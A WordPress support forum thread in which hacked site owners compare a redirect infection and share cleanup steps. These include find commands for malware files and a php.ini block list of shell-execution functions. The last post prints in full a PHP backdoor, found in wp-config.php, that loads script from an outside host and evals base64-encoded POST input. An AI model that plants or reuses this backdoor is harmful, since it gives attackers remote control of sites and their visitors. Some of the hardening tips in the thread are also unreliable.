3.3.1 Hacked by saveprefs.ru redirect

@jamieedwards Yeah, I looked for it, but it’s not on my server.

@impackt Can I borrow your guardian angel, just for a night?

I’m pretty sure by now that it’s not an issue that I myself can resolve. In my FTP client I saw this popping up:

[22:45:36] 211-Status of .htaccess:
[22:45:36]  -r--r--r--   1 henkleurinknl psacln       3519 Jan 17 21:34 .htaccess

henkleurinknl and psacln being websites of two other people – unfamiliar to me – who, not surprisingly, have also been compromised.

The problem seems to be lying somewhere else. Which does nót comfort me.

Hmmmm, after my last post i am not convinced… Patched timthumb.php, deleted all .htaccess files, and 20 minutes later they are all back ??

I have 3 1and1 accounts but one of them only have this problem, maybe the server is infected?

The server ip address is 50.21.189.85, are you on the same server?

@pkwooster On FreeBSD based hosting there is OS utility

mtree

that can calculate and later compare hash of any directories/files. Linux based OS need third party application called tripwire that do the same. Ask provider what they have. It is better than plugin because those programs has system wide permissions 555 and can be hacked only if attacker gain root privilege.

@jamieedwards, malicious script automatically search everywhere beginning from root directory. Take a look what kind of information was taken:

[Code moderated as per the Forum Rules. Please use the pastebin]

if you restrict in php.ini dangerous functions(and did restart HTTP server after that) and you still continue have problem – try to delete everything in /tmp like that rm -fr /tmp/*. Some system may allow you read/write access to /var/tmp so delete everything from there too. If you know other places where you have write permissions take a look on that places too.

look for an _cache.php file. The security guy said that was where all the .htaccess files were coming from. Mine was in /wp-content/uploads.

I have just deleted this file, now i will remove the .htaccess files again and wait 30 minutes to see if that in fact got rid of the problem :/

I’ll keep you posted as I work on it.

@tehranshahr, no I seem to be on a different 1and1 server. All my sites are pinging to 74.208.210.66

Don’t wanna spoil the fun, but there’s no _cache.php on my server.

@jamieedwards
Ok, but seems the problem is from the server, i’m testing a way to make sure that this problem is from the server, i’ll post the result tomorrow.

Ok, so it’s been over an hour and a half now and it looks like I don’t have any more infected .htaccess files showing up. There were a bunch of files that the security guy at 1and1 found that were corrupted, timthumb.php files that were in places I didn’t know about such as some plugin folders, and also all of my /wp-includes/js/plupload/plupload.html4.js seemed to have been compromised on each of my sites. I deleted these files, and the _cache.php file (one of the files used to create the bogus .htaccess files), and also a whole bunch of random numbered files that were in a /wp-content/themes/mytheme/temp folder, one of them was called 7a7f9c188164e70ad99de9734ad7b524.php for instance, but they are all random numbers. I tell you all of this but that wouldn’t have stopped anything unless he shut down the shell sessions first otherwise the connection to my files was still open, and they could have just uploaded more files. So you will need to do this, or get someone at your hosting company to do it for you.

Now I am off to change all of my admin passwords once again just in case!

Blessings to all of you, I pray you all get the solutions you need to get your sites back up and running quickly.
Jamie

Hello Everyone,

Hacks by their very nature are insidious and cannot be second guessed in any way.

I have seen code embedded in .gif files that were then extracted using base 64 to run the code pulled from the .gif file. How crazy is that?

Here is the best way to fix issues for a hack that does not seem to have a particular clean cut resolution that anyone can follow. For your own sanity this is the most reliable way to be absolutely sure your hack is gone.

You will need to ask your Host to open a new account and apply whatever money is left for hosting of the current (hacked) account to the new account.

STEP 1
Perform a new install of WordPress (latest version).

STEP 2
Make sure all re-installed plugins are freshly downloaded from their source and compatible with the latest version of WordPress.

STEP 3
Export your database from WordPress using the xml database export tool from WordPress.

STEP 4
Download all image content to your local drive to FTP up to the new account later.

STEP 5
Make sure you recreate all folders you may have had in the old site in the new site. Put all content in it’s respective place. Take extensive notes for each plugin as to their configuration, as well as all WordPress specific settings, i.e. anything you need to know before leaving the old site behind. Be very methodical in this step otherwise you will create more work for yourself.

STEP 6
Import your database (previously exported) into the new WordPress site.
Put all image content where it goes in it’s respective location/folders.

If you made accurate notes and copied everything down from the old site, it will be nothing more than a logistical exercise.

FINAL NOTE:
Always make your website as secure as you can with best practices.
Long passwords . . . changed every 6 months without fail. Including your FTP account p/w’s.

Install the Login lockdown plugin, WSD Security plugin and follow their instructions.

Never leave the Default “Admin” account in place. Always create a new “Admin” account with the name Admin. Better yet do not use any word in any language for the user name. Make your User name and password 25 characters in length using all valid upper lower case as well as special characters accepted by WordPress.

You are now equipped to weather the storm, and keep those passwords rotated out every six months if you have to schedule software to remind you to.

Granted this is not fun if you have many sites like many people but it does work.

Hello there,

I have the same issue and I am trying everything since 2 days now but whatever I do the .htaccess files are rewritten ??

I can’t localize the infected files in my wp-content… Do you have any tips to find them?

thanks

Hello,

since yesterday night, unfortunatelly, I again found activities on my server. Again several w????????w.php scripts (e. g.: w77688816w.php) are coming up. In addition, I found a script sm5ek3.php (https://pastebin.com/rekKbXJb), which probably is the one described here: https://www.webhackblog.com/2011/10/31/sm3-php-spam-script/

I now decided, to be more radical. Steps I have done:

– I delete all older content, which is not needed any more in DocumentRoot (made a backup before that with tar)
– make backup on all plugins (tar)
– delete all plugins (plan is, to reinstall the needed one later)
– delete all older themes (I only take the new ones, coming with the fresh wordpress installation)
– I followed old_fart recommendation to disable functions in php
— old-fart recommendation —
1. locate your php.ini file
2. replace there
disable_functions =
to
disable_functions = “apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, mysql_pconnect, openlog, passthru, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode”
3. force to restart http server
—

– find and afterwards delete malware files by …
– … find . -name sm*.php -print
– … find . -name “w?????????.php” -print

– delete all .htaccess files with > find . -name “.htaccess” -exec rm {} \;

– recreate my wp-config.php from scratch!!!!

In the old one, I found this code, which probably isn’t anything, I like to have. Maybe, this is the backdoor??:

“<?php global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = “lb11”; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = “102”; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo “<script>document.cookie='”.$sessdt_k.”=”.$sessdt_f.”‘;</script>”; } } else { if($_COOKIE[$sessdt_k]==”102″) { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo “<script>document.cookie='”.$sessdt_k.”=”.$sessdt_f.”‘;</script>”; } $sessdt_j = @$_SERVER[“HTTP_HOST”].@$_SERVER[“REQUEST_URI”]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = “https://turnitupnow.net/?rnd=&#8221;.$sessdt_f.substr($sessdt_v,-200); echo “<script src=’$sessdt_u’></script>”; echo “<meta http-equiv=’refresh’ content=’0;url=https://$sessdt_j’><!–“; } } $sessdt_p = “showimg”; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
”

the above code is explained here: https://stackoverflow.com/questions/8068871/got-hacked-anyone-know-what-this-php-code-does

This code is present also in most of the php-files of my theme!! I have to clean this up!